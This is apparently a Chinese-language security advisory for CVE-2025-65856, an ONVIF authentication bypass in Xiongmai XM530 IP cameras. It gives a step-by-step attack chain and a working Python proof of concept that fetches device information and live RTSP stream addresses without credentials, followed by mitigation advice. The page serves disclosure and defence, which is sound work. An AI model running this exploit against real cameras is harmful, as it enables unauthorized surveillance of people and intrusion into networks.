CVE-2025-65856 Xiongmai XM530 IP摄像头ONVIF认证绕过漏洞

漏洞信息

漏洞编号

CVE-2025-65856

漏洞类型

认证绕过

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Xiongmai XM530 IP Camera (固件 V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06)

漏洞概述

CVE-2025-65856是海眸科技（Xiongmai）XM530系列IP摄像头存在的高危认证绕过漏洞。该漏洞影响固件版本V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06，由于ONVIF（Open Network Video Interface Forum）服务实现存在缺陷，未能对31个关键API端点实施有效的身份验证机制。攻击者无需提供任何凭据，即可通过构造特定的ONVIF请求直接访问设备的敏感信息接口，包括但不限于设备配置信息、用户列表、网络设置等。更严重的是，攻击者可以绕过认证直接获取实时视频流，实现对监控画面的非法访问。鉴于该漏洞的CVSS评分高达9.8（满分10分），属于紧急严重级别，且攻击复杂度低、无需特殊权限和用户交互，互联网上大量部署的同类设备面临极高的被攻击风险。攻击者可通过该漏洞进行大规模非法监控、窃取敏感视频数据，甚至可能进一步渗透内网系统。

技术细节

该漏洞根因于Xiongmai XM530摄像头固件中ONVIF服务的认证机制实现不完善。ONVIF协议规范要求对敏感操作进行身份验证，但该固件版本在31个关键端点的处理逻辑中遗漏了认证检查。攻击者可通过发送特制的ONVIF请求到设备IP的特定端口（通常为80或8080），无需提供任何用户名密码即可调用GetDeviceInformation、GetNetworkInterfaces、GetUsers、GetRecordingSourceGroups等敏感方法获取设备配置信息。关键的是，通过调用GetStreamUri方法可绕过认证直接获取实时视频流的RTSP URL地址，随后使用标准播放器（如VLC）即可观看实时监控画面。攻击利用步骤：首先发送ONVIF探测请求获取设备能力描述，然后遍历未认证端点列表收集信息，最后调用GetStreamUri获取视频流地址。漏洞影响范围覆盖所有使用相同固件版本的海眸科技设备。

攻击链分析

STEP 1

步骤1

扫描识别：攻击者通过扫描发现互联网或内网中运行V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06固件的海眸科技XM530摄像头

STEP 2

步骤2

探测确认：发送ONVIF GetCapabilities请求探测设备ONVIF服务，识别设备类型和服务端点

STEP 3

步骤3

认证绕过：直接发送未认证的ONVIF请求到31个未授权端点，包括GetDeviceInformation、GetUsers、GetNetworkInterfaces等

STEP 4

步骤4

信息收集：获取设备完整配置信息、用户名列表、网络拓扑、存储配置等敏感数据

STEP 5

步骤5

视频窃取：调用GetStreamUri端点获取实时视频流RTSP地址，使用VLC等播放器直接观看监控画面

STEP 6

步骤6

持久化利用：将窃取的RTSP流地址用于非法监控，或将收集的信息用于进一步内网渗透攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-65856 PoC - Xiongmai XM530 IP Camera ONVIF Authentication Bypass
Author: Security Researcher
"""
import requests
import xml.etree.ElementTree as ET

TARGET_IP = "192.168.1.100"  # Target camera IP
ONVIF_PORT = 80

# ONVIF namespaces
NAMESPACES = {
    'SOAP-ENV': 'http://www.w3.org/2003/05/soap-envelope',
    'ns1': 'http://www.onvif.org/ver10/device/wsdl',
    'tt': 'http://www.onvif.org/ver10/schema'
}

def create_onvif_request(soap_body):
    """Generate ONVIF SOAP request without authentication"""
    return f'''<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope">
  <SOAP-ENV:Header/>
  <SOAP-ENV:Body>
    {soap_body}
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>'''

def send_onvif_request(endpoint, soap_body):
    """Send ONVIF request to target device"""
    url = f"http://{TARGET_IP}:{ONVIF_PORT}/{endpoint}"
    headers = {'Content-Type': 'application/soap+xml; charset=utf-8'}
    try:
        resp = requests.post(url, data=soap_body.encode(), headers=headers, timeout=5)
        return resp.text
    except Exception as e:
        return f"Error: {e}"

def get_device_info():
    """Bypass auth to get device information"""
    soap = '''<ns1:GetDeviceInformation/>'''
    request = create_onvif_request(soap)
    return send_onvif_request('onvif/device_service', request)

def get_stream_uri():
    """Bypass auth to get live video stream URI"""
    soap = '''<ns1:GetStreamUri>
      <ns1:StreamSetup>
        <tt:Stream>RTP-Unicast</tt:Stream>
        <tt:Transport><tt:Protocol>RTSP</tt:Protocol></tt:Transport>
      </ns1:StreamSetup>
      <ns1:ProfileToken>Profile_1</ns1:ProfileToken>
    </ns1:GetStreamUri>'''
    request = create_onvif_request(soap)
    return send_onvif_request('onvif/media_service', request)

def main():
    print(f"[*] CVE-2025-65856 PoC - Targeting {TARGET_IP}")
    print("[*] Testing authentication bypass on ONVIF endpoints\n")
    
    print("[1] Attempting to get device information...")
    device_info = get_device_info()
    print(device_info)
    
    print("\n[2] Attempting to get video stream URI...")
    stream_uri = get_stream_uri()
    print(stream_uri)
    
    print("\n[!] If unauthenticated access succeeds, device is vulnerable")

if __name__ == "__main__":
    main()

影响范围

Xiongmai XM530 IP Camera 固件 V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06

防御指南

临时缓解措施

建议立即在网络边界设备（如防火墙）上阻断对受影响摄像头ONVIF端口的外部访问，将设备置于受保护的网段中并限制仅允许经过验证的管理终端访问。同时联系设备供应商获取安全补丁，在测试环境中验证后尽快部署固件更新。短期内可通过ACL策略限制对554、80、8080等端口的访问，仅允许可信IP地址段访问设备。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-65856
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-65856
3 Details https://www.cvedetails.com/cve/CVE-2025-65856/
4 VulDB https://vuldb.com/cve/CVE-2025-65856
5 Link http://hangzhou.com
6 Link http://ip.com
7 Link https://luismirandaacebedo.github.io/CVE-2025-65856/